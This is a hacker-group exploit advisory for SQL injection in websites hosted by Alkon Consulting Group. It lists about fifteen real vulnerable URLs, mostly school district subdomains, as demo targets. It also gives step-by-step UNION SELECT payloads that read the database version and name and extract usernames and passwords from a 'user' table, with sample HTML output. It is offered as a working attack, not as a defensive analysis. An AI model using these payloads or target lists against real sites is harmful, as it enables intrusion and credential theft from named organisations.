Alkon Consulting Group suffers from a remote SQL injection vulnerability.
a551f13148cf96a084c9c8bebc5a521b641d35550dd9f4e83a519b39ca931098
|=*-*-*-*-*=*-*-*-*-*=*-*-*-*-*=*-*-*-*-*=*-*-*-*-*=*-*-*-*-*-*-*-*-*=|
|* ______ ____ __ __ |
|* /\__ _\/\ _`\ /\ \/\ \ |
|* \/_/\ \/\ \ \L\ \\ \ \_\ \ { Turki$ hackers } |
|* \ \ \ \ \ _ <'\ \ _ \ |
|* \ \ \ \ \ \L\ \\ \ \ \ \ |
|* \ \_\ \ \____/ \ \_\ \_\ |
|* \/_/ \/___/ \/_/\/_/ |
|* |
|* Skote_vahshat and bl4ck.viper |
|=*-*-*-*-*=*-*-*-*-*=*-*-*-*-*=*-*-*-*-*=*-*-*-*-*=*-*-*-*-*-*-*-*-*=|
=========================================================================
\* [Title] :[Alkon Consulting Groupsql injection vulnerability]/*
\* [Author] :[skote_vahshat] /*
\* [Home] :[Http://turk-bh.ir] /*
\* [Email] :[skote.vahshat@Gmail.Com] /*
==========================================================================
/*
/*
/*
/* Website Hosting provided by Alkon Consulting Group
/*
/*
/* DB Server: MySQL
/* version PHP : 5.2.6
/* Web Server : apache ,unix ,mod_ssl2.2 ,php ,....
/*
/* ===================================================================
/* [+]Exploit :
/* http://www.target.com/page.php[SQLi]
/*
/* [+] (target )
/* [.] (Demo )
/* [+]http://bibich.lcsc.us/page.php?id=44[SQLi]
/* [+]http://grimmer.lcsc.us/page.php?id=44 [SQLi]
/* [+]http://www.lcsc.us/page.php?id=44 [SQLi]
/* [+]http://kahler.lcsc.us/page.php?id=44 [SQLi]
/* [+]http://lakecentralef.org/page.php?id=58 [SQLi]
/* [+]http://homan.lcsc.us/page.php?id=44 [SQLi]
/* [+]http://peifer.lcsc.us/page.php?id=44 [SQLi]
/* [+]http://westlake.lcsc.us/page.php?id=11 [SQLi]
/* [+]http://www.edmunds.com/page.php?id=11 [SQLi]
/* [+]http://transport.lcsc.us/page.php?id=11 [SQLi]
/* [+]http://watson.lcsc.us/page.php?id=136 [SQLi]
/* [+]http://clark.lcsc.us/page.php?id=44 [SQLi]
/* [+]http://help.lcsc.us/page.php?id=99 [SQLi]
/* [+]http://kahler.lcsc.us/page.php?id=47 [SQLi]
/* [+]http://lake-central.lcsc.us/page.php?id=17 [SQLi]
/* [+]
/* [+]inject:
/* union+select+1,2,3,4,5,6,7,8,9,10,11,12,13 =>> column 2 and 3
/* union+select+1,@@version,3,4,5,6,7,8,9,10,11,12,13 =>> version 5.0.92-community
/* union+select+1,database(),3,4,5,6,7,8,9,10,11,12,13 =>> lcscus_lchs
/*
/* [+] (table) =>> user
/*
/* union+select+1,2,3,4,5,6,7,8,9,10,11,12,13+from+user
/*
/*
/* [+] column
/* union+select+1,uname,pw,4,5,6,7,8,9,10,11,12,13+from+user
/*
/* =>>> Query and answers <<<=
/*
/* union+select+1,2,3,4,5,6,7,8,9,10,11,12,13+from+user
/* columna 2 and 3
/* <td width="960" valign="middle" id="boxheader"><strong>2/strong></td>
/* <td valign="top" id="padding1">3</td>
/*
/* union+select+1,uname,pw,4,5,6,7,8,9,10,11,12,13+from+user
/*
/* <td width="960" valign="middle" id="boxheader"><strong>username/strong></td>
/* <td valign="top" id="padding1">password</td>
/*---------------------------
<td width="960" valign="middle" id="boxheader"><strong>tiwema</strong></td>
</tr>
<tr>
<td valign="top" height="300" id="subboxes"><table width="100%" border="0" cellpadding="0" cellspacing="0">
<!--DWLayoutTable-->
<tr>
<td width="335" valign="top" align="center"><br /><img src="img/school-logo-png-256x283.png" width="256" height="283" /><br /></td>
<td width="625" valign="top">
<table cellpadding="0" cellspacing="0" border="0" width="100%">
<tr>
<td valign="top" id="padding1">3</td>
</tr>
===================================================================================
|_***_|thanks: bl4ck.viper , dr.tofan , hellboy , netqurd , turk_server kingcope |
|_***_| spical thnaks :all tbh member ,iraniyan hacker all turkiS hackers |
===================================================================================